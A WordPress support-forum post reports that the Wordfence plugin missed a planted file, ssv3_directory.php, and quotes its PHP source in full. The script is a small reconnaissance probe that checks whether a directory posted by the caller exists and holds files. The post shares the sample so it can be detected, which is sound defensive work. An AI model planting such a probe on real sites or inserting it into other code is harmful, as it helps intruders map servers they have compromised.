Support » Plugin: Wordfence Security » WF failed to detect malicious script

  • Today I found a malicious script in several websites protected by Wordfence. The filename is ssv3_directory.php, and it was found in the web root directory. The file was not flagged. The following is the contents of this file. I found that this file is used to show information of the server.

    <?php
    error_reporting(0);
    @ini_set('cgi.fix_pathinfo', 1);
    if (is_dir($_POST['directory']) && !is_dir_empty($_POST['directory'])) {
    	echo 1;
    } else {
    	echo 0;
    }
    
    	function is_dir_empty($dir) {
    	if (!is_readable($dir)) return null;
    		$handle = opendir($dir);
    		while (false !== ($entry = readdir($handle))) {
    			if ($entry != "." && $entry != "..") {
    				return false;
    			}
    		}
    	return true;
    	}
    
    exit;
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
  • You must be logged in to reply to this topic.